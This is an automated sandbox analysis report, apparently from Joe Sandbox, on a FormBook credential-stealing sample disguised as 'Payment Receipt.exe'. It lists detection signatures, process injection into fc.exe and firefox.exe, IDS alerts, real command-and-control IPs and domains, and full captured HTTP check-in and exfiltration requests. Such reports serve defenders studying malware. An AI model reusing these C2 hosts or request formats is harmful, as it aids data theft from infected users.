Windows Analysis Report
Payment Receipt.exe

Overview

General Information

Sample name: Payment Receipt.exe
Analysis ID: 1583685
MD5: e6bd9e9d02f848789769edcf7023e15c
SHA1: f87837fe132810e33552511906bc35089c213f7b
SHA256: f7e7d1d597fa001cfdfdc86c9aa5c97578b110f3598a2c9fdb4158abe760acc2
Tags: exe, user-asdasdd

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Payment Receipt.exe (PID: 5804 cmdline: "C:\Users\user\Desktop\Payment Receipt.exe" MD5: E6BD9E9D02F848789769EDCF7023E15C)
    • MEREhDqMRRNSzT.exe (PID: 4144 cmdline: "C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • fc.exe (PID: 6880 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
        • MEREhDqMRRNSzT.exe (PID: 1748 cmdline: "C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • firefox.exe (PID: 4960 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.4097035326.0000000000800000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2016587494.00000000014D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.4098003427.0000000002D50000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.4097327937.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
0.2.Payment Receipt.exe.730000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
No Sigma rule has matched


AV Detection

Source: Payment Receipt.exe, Avira: detected
Source: http://www.gayhxi.info/k2i2/?1V=oYl0YuhK+EfenM8eRya5NBLYEg3QT0lWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYH71Qo8BiJAJadzAW0K4pL4P2w4s2MVD1OU=&w0DDw=KH0hz6, Avira URL Cloud: Label: malware
Source: Payment Receipt.exe, Virustotal: Detection: 62%
Source: Payment Receipt.exe, ReversingLabs: Detection: 71%
Source: Yara match, File source: 0.2.Payment Receipt.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000005.00000002.4097035326.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2016587494.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.4098003427.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2016396507.0000000000731000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.4097327937.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.4097999187.0000000003030000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2016901263.0000000002480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: Payment Receipt.exe, Joe Sandbox ML: detected
Source: Payment Receipt.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Payment Receipt.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: Payment Receipt.exe, 00000000.00000003.2016351170.000000000111D000.00000004.00000020.00020000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000002.4097527146.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: Payment Receipt.exe, 00000000.00000003.2016351170.000000000111D000.00000004.00000020.00020000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000002.4097527146.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MEREhDqMRRNSzT.exe, 00000004.00000000.1941108983.00000000003CE000.00000002.00000001.01000000.00000005.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4097025395.00000000003CE000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: Payment Receipt.exe, 00000000.00000002.2016615336.000000000170E000.00000040.00001000.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1926428067.0000000001203000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1928236553.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4098206639.000000000314E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2018181889.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2016579747.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4098206639.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Payment Receipt.exe, Payment Receipt.exe, 00000000.00000002.2016615336.000000000170E000.00000040.00001000.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1926428067.0000000001203000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1928236553.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000005.00000002.4098206639.000000000314E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2018181889.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2016579747.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4098206639.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\fc.exe, Code function: 5_2_0081C870 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\fc.exe, Code function: 4x nop then xor eax, eax (5_2_00809EC0)
Source: C:\Windows\SysWOW64\fc.exe, Code function: 4x nop then pop edi (5_2_0080E4C7)
Source: C:\Windows\SysWOW64\fc.exe, Code function: 4x nop then mov ebx, 00000004h (5_2_02E504CE)
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then mov ebx, 00000004h (7_2_0000022E9D0F54CE)

Networking

Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 47.83.1.90:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 47.83.1.90:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49773 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49788 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49805 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49824 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49824 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49859 -> 104.21.18.171:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49875 -> 104.21.18.171:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49891 -> 104.21.18.171:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49953 -> 134.122.133.80:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49988 -> 134.122.133.80:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49969 -> 134.122.133.80:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 134.122.133.80:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 154.197.162.239:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 199.192.21.169:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 134.122.133.80:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50030 -> 134.122.133.80:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 134.122.133.80:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50026 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 154.197.162.239:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49912 -> 104.21.18.171:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49912 -> 104.21.18.171:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 154.197.162.239:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50034 -> 47.83.1.90:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 47.83.1.90:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 47.83.1.90:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 199.59.243.228:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 13.228.81.39:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 13.228.81.39:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 134.122.133.80:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50015 -> 199.192.21.169:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 154.39.239.237:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 199.59.243.228:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50038 -> 188.114.97.3:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 188.114.97.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 188.114.97.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 199.192.21.169:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 154.39.239.237:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 47.83.1.90:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 188.114.97.3:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50046 -> 13.228.81.39:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50046 -> 13.228.81.39:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50018 -> 199.192.21.169:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 13.228.81.39:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50018 -> 199.192.21.169:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 84.32.84.32:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50042 -> 199.59.243.228:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50042 -> 199.59.243.228:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 188.114.97.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 199.59.243.228:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50004 -> 134.122.133.80:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50004 -> 134.122.133.80:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 154.39.239.237:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 154.197.162.239:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 154.197.162.239:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 47.83.1.90:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50050 -> 154.39.239.237:80
Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50050 -> 154.39.239.237:80
Source: Joe Sandbox View, IP Address: 199.192.21.169
Source: Joe Sandbox View, IP Address: 188.114.97.3
Source: Joe Sandbox View, ASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View, ASN Name: VODANETInternationalIP-BackboneofVodafoneDE
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /01c7/?1V=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU=&w0DDw=KH0hz6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.sonixingenuine.shopConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /b9e2/?1V=KXKmlftrGUnNwN71qtFvViHh9QQKT49uyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NMc1rtl+75eG21JCXkgtBEctrkJEqfktzAA=&w0DDw=KH0hz6 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.moyu19.proConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global traffic
              DNS traffic detected: DNS query: www.gayhxi.info
              Source: global traffic
              DNS traffic detected: DNS query: www.promocao.info
              Source: global traffic
              DNS traffic detected: DNS query: www.grimbo.boats
              Source: global traffic
              DNS traffic detected: DNS query: www.44756.pizza
              Source: global traffic
              DNS traffic detected: DNS query: www.lonfor.website
              Source: global traffic
              DNS traffic detected: DNS query: www.investshares.net
              Source: global traffic
              DNS traffic detected: DNS query: www.nosolofichas.online
              Source: global traffic
              DNS traffic detected: DNS query: www.jrcov55qgcxp5fwa.top
              Source: global traffic
              DNS traffic detected: DNS query: www.adadev.info
              Source: global traffic
              DNS traffic detected: DNS query: www.cifasnc.info
              Source: global traffic
              DNS traffic detected: DNS query: www.ebsmadrid.store
              Source: global traffic
              DNS traffic detected: DNS query: www.denture-prices.click
              Source: global traffic
              DNS traffic detected: DNS query: www.sonixingenuine.shop
              Source: global traffic
              DNS traffic detected: DNS query: www.moyu19.pro
              Source: unknown
              HTTP traffic detected: POST /zaz4/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate
                Host: www.promocao.info
                Origin: http://www.promocao.info
                Cache-Control: max-age=0
                Content-Length: 199
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Referer: http://www.promocao.info/zaz4/
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                Data Ascii: 1V=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvOnB7i2RVcK+Xql9nS8jzCZaPJ1BQHVczg==
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Fri, 03 Jan 2025 10:40:13 GMT
                Content-Type: text/html; charset=iso-8859-1
                Transfer-Encoding: chunked
                Connection: close
                cf-cache-status: DYNAMIC
                vary: accept-encoding
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fDiyxrkpkK%2FuFGML0uUap2rQ3EptqY%2FciHyVTk%2FNdUhiG4kev%2FShO5TweBIYXcFtkHMlwbI4rK8MJmw3cQZK%2B%2BmBhgD0TBQWou7b1hc4N8M5lF%2BFepssTAhFF9Tl22R7fequ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8fc25e912fc780d6-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1588&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Fri, 03 Jan 2025 10:40:15 GMT
                Content-Type: text/html; charset=iso-8859-1
                Transfer-Encoding: chunked
                Connection: close
                cf-cache-status: DYNAMIC
                vary: accept-encoding
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2FUGwMqTdDiIcJ%2BONzJV8j27%2BqDZosSTp2pYPNUtQt7njdRmSvWk29Z15FzbqpSeELWxkW3qz%2FPje%2BVozuX%2F%2BqSqNOgKrpzQ4lYXCfPKG52R7FwUK%2B5NjdJN3J6JTorjTpY2"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8fc25ea14f97428b-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1549&rtt_var=774&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Fri, 03 Jan 2025 10:40:18 GMT
                Content-Type: text/html; charset=iso-8859-1
                Transfer-Encoding: chunked
                Connection: close
                cf-cache-status: DYNAMIC
                vary: accept-encoding
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4CLRCpe2cnLf4N1URG%2BkjTJhyg0CluvUJbhOL%2Fystyo5JCe9G7Al9MreSp13dHPYMUYGFsCt7XgojiAjkC%2F3H1Z0AEevAlHa7DKOf0elEjdKsxR9uc7vlLd0qQg2dG9l0v6E"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8fc25eb19b6a187d-EWR
                Content-Encoding: gzip
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1623&rtt_var=811&sent=5&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10833&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Fri, 03 Jan 2025 10:40:20 GMT
                Content-Type: text/html; charset=iso-8859-1
                Transfer-Encoding: chunked
                Connection: close
                cf-cache-status: DYNAMIC
                vary: accept-encoding
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ly%2Fd9RibHA84VfMWqJwvyJ5obQbaW1gfczgzjCecOgQwB1eSOMtWx9AQFSWnL9Zfoq8UH4xvSHBOKRENJ%2BZvl0EXa95vtbvY%2FHUVvUOcC62S2xStTePS678fYAnMR7TajF14"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8fc25ec1daa24239-EWR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1579&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=467&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Length: 148
                Content-Type: text/html
                Date: Fri, 03 Jan 2025 10:40:27 GMT
                Etag: "6743f11f-94"
                Server: nginx
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Length: 148
                Content-Type: text/html
                Date: Fri, 03 Jan 2025 10:40:29 GMT
                Etag: "6743f11f-94"
                Server: nginx
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Length: 148
                Content-Type: text/html
                Date: Fri, 03 Jan 2025 10:40:32 GMT
                Etag: "6743f11f-94"
                Server: nginx
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Length: 148
                Content-Type: text/html
                Date: Fri, 03 Jan 2025 10:40:34 GMT
                Etag: "6743f11f-94"
                Server: nginx
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Fri, 03 Jan 2025 10:40:40 GMT
                Server: Apache
                Content-Length: 774
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Fri, 03 Jan 2025 10:40:43 GMT
                Server: Apache
                Content-Length: 774
                Connection: close
                Content-Type: text/html
